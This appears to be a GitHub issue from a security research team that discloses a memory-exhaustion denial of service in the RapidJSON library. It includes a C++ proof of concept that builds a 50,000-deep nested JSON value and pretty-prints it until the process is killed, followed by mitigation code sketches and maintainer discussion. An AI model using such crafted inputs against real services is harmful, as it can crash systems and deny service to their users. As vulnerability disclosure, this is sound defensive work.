
Memory exhaustion denial of service #2283

Open
orihjfrog opened this issue May 30, 2024 · 5 comments

Comments


orihjfrog commented May 30, 2024

Summary

RapidJSON crashes when parsing a malformed JSON input.

Technical Details

The function Accept in document.h visits a DOM value and feeds it to a handler. One of the available handlers is PrettyWriter, which writes the value to an output stream. One of the available stream types is StringBuffer, which places no limit on the amount of data written into it. Because PrettyWriter emits indentation spaces for every nesting level of an array or object, the pretty-printed output of a deeply nested value grows quadratically with the nesting depth, and therefore needs far more memory than the in-memory representation of the value itself. A malicious JSON document with a very deeply nested array or object can thus exhaust memory and crash the software, even when the nesting is shallow enough for the recursive parser to handle.

Proof of Concept

The following code crashes before printing the string “end”. Note that we used a relatively small nesting depth (50,000) and the recursive version of the Parse function, to show that the nesting is shallow enough to parse but produces an output string that is far too large.

#include <iostream>
#include "rapidjson/document.h"
#include "rapidjson/stringbuffer.h"
#include "rapidjson/prettywriter.h"

using namespace rapidjson;

int main() {
   std::string json = "{\"a\":";
   for (int i = 0; i < 50000; i++) {
       json += "[";
   }
   json += "5";
   for (int i = 0; i < 50000; i++) {
       json += "]";
   }
   json += "}";

   Document d;

   std::cout << "before parsing" << std::endl << std::flush;

   d.Parse(json.c_str());

   Value& s = d["a"];

   std::cout << "before converting back to string" << std::endl << std::flush;

   StringBuffer buffer;
   PrettyWriter<StringBuffer> writer(buffer);
   s.Accept(writer);

   std::cout << "end" << std::endl;

   return 0;
}

When running this code we got:

before parsing
before converting back to string
Killed

Fix suggestion

Add an argument to StringBuffer that will allow limiting the size of the string.
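In the same spirit, a size cap can be prototyped outside the library: RapidJSON's writers accept any type satisfying its output-stream concept (a Ch typedef plus Put and Flush). The sketch below is our own illustration of that idea; the class name and the throw-on-overflow policy are assumptions, and it is shown standalone, without the rapidjson headers:

```cpp
#include <cstddef>
#include <stdexcept>
#include <string>

// Hypothetical size-capped output buffer satisfying RapidJSON's
// output-stream concept (Ch, Put, Flush). Instead of growing without
// bound, it throws once the configured cap is reached.
class CappedStringBuffer {
public:
    typedef char Ch;

    explicit CappedStringBuffer(std::size_t cap) : cap_(cap) {}

    void Put(Ch c) {
        if (data_.size() >= cap_)
            throw std::length_error("CappedStringBuffer: output cap exceeded");
        data_.push_back(c);
    }
    void Flush() {}  // nothing buffered externally, so nothing to do

    const Ch* GetString() const { return data_.c_str(); }
    std::size_t GetSize() const { return data_.size(); }

private:
    std::size_t cap_;
    std::string data_;
};
```

One could then instantiate PrettyWriter<CappedStringBuffer> and catch the exception instead of being killed by the OOM killer. Since RapidJSON is exception-free by design, throwing from Put should be weighed carefully; signaling the overflow through a flag and having the caller check it is the more idiomatic variant.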

Credit

The vulnerability was discovered by Ori Hollander of the JFrog Security Research team.

@srmish-jfrog

We could not find an official RapidJSON disclosure email address. We tried to report this issue privately to the package maintainer ([email protected]) but didn't receive a response for more than 6 months. Hopefully someone can see this issue here and address it.

@aikawayataro (Contributor)

You can define your own allocator with memory cap in this case.

@srmish-jfrog

How can this be done? Is it mentioned anywhere in the documentation? (We couldn't find it documented, nor discussed in any other issue.)

Why not add a default memory cap with a reasonable limit in order to avoid DoS?

@aikawayataro (Contributor)

How can this be done?

By defining your own allocator type and passing it as a template argument to any dependent type or function.
A similar topic, the "null from malloc" problem, was discussed here earlier.
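For reference, a minimal sketch of such an allocator, modeled on RapidJSON's allocator concept (kNeedFree, Malloc, Realloc, and a static Free). The class name and cap policy are illustrative, and it is shown standalone without the rapidjson headers; returning a null pointer is how a RapidJSON allocator signals allocation failure:

```cpp
#include <cstddef>
#include <cstdlib>

// Illustrative allocator with a hard memory cap. When the cap would be
// exceeded, it returns nullptr, which RapidJSON treats as out-of-memory.
class CappedAllocator {
public:
    static const bool kNeedFree = true;

    explicit CappedAllocator(std::size_t cap) : cap_(cap), used_(0) {}

    void* Malloc(std::size_t size) {
        if (size == 0) return nullptr;
        if (used_ + size > cap_) return nullptr;  // cap exceeded: report OOM
        used_ += size;
        return std::malloc(size);
    }

    void* Realloc(void* orig, std::size_t origSize, std::size_t newSize) {
        if (newSize == 0) {           // treat shrink-to-zero as a free
            std::free(orig);
            used_ -= origSize;
            return nullptr;
        }
        if (used_ - origSize + newSize > cap_) return nullptr;
        void* p = std::realloc(orig, newSize);
        if (p) used_ = used_ - origSize + newSize;
        return p;
    }

    static void Free(void* ptr) { std::free(ptr); }

private:
    std::size_t cap_;
    std::size_t used_;
};
```

One would then use e.g. GenericStringBuffer<UTF8<>, CappedAllocator> (passing a pointer to an allocator instance) and check the writer's return value, since RapidJSON reports failure through return codes rather than exceptions.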

Why not add a default memory cap with a reasonable limit in order to avoid DoS?

I think it's for the same reason that you won't find this kind of "safety" in many other tools. Do you have such a reasonable limit in your std::vector?
Nowhere does RapidJSON claim to offer memory safety out of the box. The same principle applies to countless C/C++ libraries: if you need safety, you either choose a library designed for it or implement the mechanism yourself. With RapidJSON that is possible: you can define your own allocator types, and use filters, streams, and SAX.

@aikawayataro (Contributor)

I think the main reason RapidJSON is considered unsafe is that it does not throw exceptions, by design. But you can easily extend it.

Using this library in new projects should be a matter of careful consideration. While it works and can be adapted for memory safety and exceptions, there has been no new release for eight years, and as far as I can see, only bug fixes are merged. If you need a fast JSON parser, there are many libraries with a healthy release model, and some of them are even faster than RapidJSON.
